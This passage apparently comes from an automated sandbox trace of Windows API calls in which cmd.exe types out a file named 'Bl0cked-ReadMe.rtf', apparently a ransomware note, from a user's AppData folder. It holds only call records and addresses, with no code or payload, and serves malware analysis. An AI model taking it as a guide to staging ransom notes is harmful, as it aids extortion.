dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0141.699] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0141.699] GetConsoleTitleW (in: lpConsoleTitle=0x1cf410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.699] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0141.699] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0141.699] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0141.699] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0141.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.700] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cef74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef74) returned 0x1e0e90 [0141.700] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0141.700] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0141.700] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0141.700] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cde80, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0141.701] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0141.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.701] GetFileType (hFile=0x54) returned 0x1 [0141.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.701] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1cded8 | out: lpFileSizeHigh=0x1cded8*=0x0) returned 0x1632 [0141.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.701] 
SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.701] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0141.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.701] GetFileType (hFile=0x4c) returned 0x1 [0141.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.701] GetFileType (hFile=0x4c) returned 0x1 [0141.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] GetFileType (hFile=0x4c) returned 0x1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] GetFileType (hFile=0x4c) returned 0x1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] GetFileType (hFile=0x4c) returned 0x1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | 
out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] GetFileType (hFile=0x4c) returned 0x1 [0141.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.703] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] GetFileType (hFile=0x4c) returned 0x1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.704] GetFileType (hFile=0x4c) returned 0x1 [0141.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0141.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.704] GetFileType (hFile=0x4c) returned 0x1 [0141.704] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0141.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.251] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.252] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.252] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 
[0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.252] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.252] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0142.253] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.253] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] GetFileType (hFile=0x4c) returned 0x1 [0142.253] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.253] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] GetFileType (hFile=0x4c) returned 0x1 [0142.254] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.254] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.255] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.255] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType 
(hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.255] GetFileType (hFile=0x4c) returned 0x1 [0142.255] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.256] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.256] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] GetFileType (hFile=0x4c) returned 0x1 [0142.256] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.256] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, 
lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee00*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cee50*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceea0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] GetFileType (hFile=0x4c) returned 0x1 [0142.257] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.257] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceef0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ceef0*, lpNumberOfBytesWritten=0x1cdef4*=0x20, 
lpOverlapped=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.257] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdee0 | out: lpNewFilePointer=0x0) returned 1 [0142.257] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.257] ReadFile (in: hFile=0x54, lpBuffer=0x1ced10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesRead=0x1cdf00*=0x200, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced10*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1ced60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1ced60*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdef4, lpOverlapped=0x0 | out: lpBuffer=0x1cedb0*, lpNumberOfBytesWritten=0x1cdef4*=0x50, lpOverlapped=0x0) returned 1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] GetFileType (hFile=0x4c) returned 0x1 [0142.258] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.258] WriteFile (in: hFile=0x4c, 
